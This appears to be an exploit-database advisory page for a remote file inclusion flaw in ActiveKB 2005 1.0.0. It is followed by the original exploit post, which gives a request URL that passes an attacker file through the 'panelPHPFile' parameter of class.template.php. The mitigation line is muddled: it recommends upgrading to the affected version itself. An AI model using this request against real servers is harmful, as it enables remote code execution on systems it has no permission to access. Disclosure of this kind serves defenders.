RFI Vulnerability in ActiveKB 2005 1.0.0

vendor:

ActiveKB 2005

by:

indoushka

9.3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: ActiveKB 2005

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:activekb:activekb_2005

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

RFI Vulnerability in ActiveKB 2005 1.0.0

A remote file inclusion (RFI) vulnerability exists in ActiveKB 2005 1.0.0. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system. The vulnerable parameter is 'panelPHPFile' which is located in the 'class.template.php' file. An attacker can send a specially crafted HTTP request containing a malicious file URL in the 'panelPHPFile' parameter to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of ActiveKB 2005 1.0.0 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

                       ..:::::::::..
                    ..:::aad8888888baa:::..
                 .::::d:?88888888888?::8b::::.
               .:::d8888:?88888888??a888888b:::.
             .:::d8888888a8888888aa8888888888b:::.
            ::::dP::::::::Dz-GhostTeam:::::::Yb::::
           ::::dP:::::::::Y888888888P:::::::::Yb::::
          ::::d8:::::::::::indoushka:::::::::::8b::::
         .::::88::::::::::::Y88888P::::::::::::88::::.
         :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::
         :::::::Y88888888888P::|::Y88888888888P:::::::
         ::::::::::::::::888:::|:::888::::::::::::::::
         `:::::::::::::::8888888888888b::::::::::::::'
          :::::::::::::::88888888888888::::::::::::::
           :::::::::::::d88888888888888:::::::::::::
            ::::::::::::88::88::88:::88::::::::::::
             `::::::::::88::88::88:::88::::::::::'
               `::::::::88::88::P::::88::::::::'
                 `::::::88::88:::::::88::::::'
                    ``:::::::::::::::::::''
                         ``:::::::::''
            this file brought to you by Dz-Ghost Team


       |Redda | Saousha | indoushka | Mr.Sql | XxProratxX |


                           ÈÓã Çááå ÇáÑÍãä ÇáÑÍíã
  --                    [ Dz-Ghost Team ]                           ---
-------------------------------------------------------------------------
# Author  : indoushka
# email   : indoushka@hotmail.com
# Home    : ãÄÓÓÉ ÇÚÇÏÉ ÇáÊÑÈíÉ Ãã ÇáÈæÇÞí 04325
# Script  : powered by ActiveKB 2005 1.0.0
# Bug     : RFI
======================         Dz-Ghost Team           ===================
# Exploit  :
 

1- http://server/sm-ak051/includes/classes/class.template.php?panelPHPFile=[EV!L]

=========================Dz-Ghost Team===================
Greetz : all my friend and Dz-Team * Dos-Dz * Snakespc * His0k4
-------------------------------------------------------------------------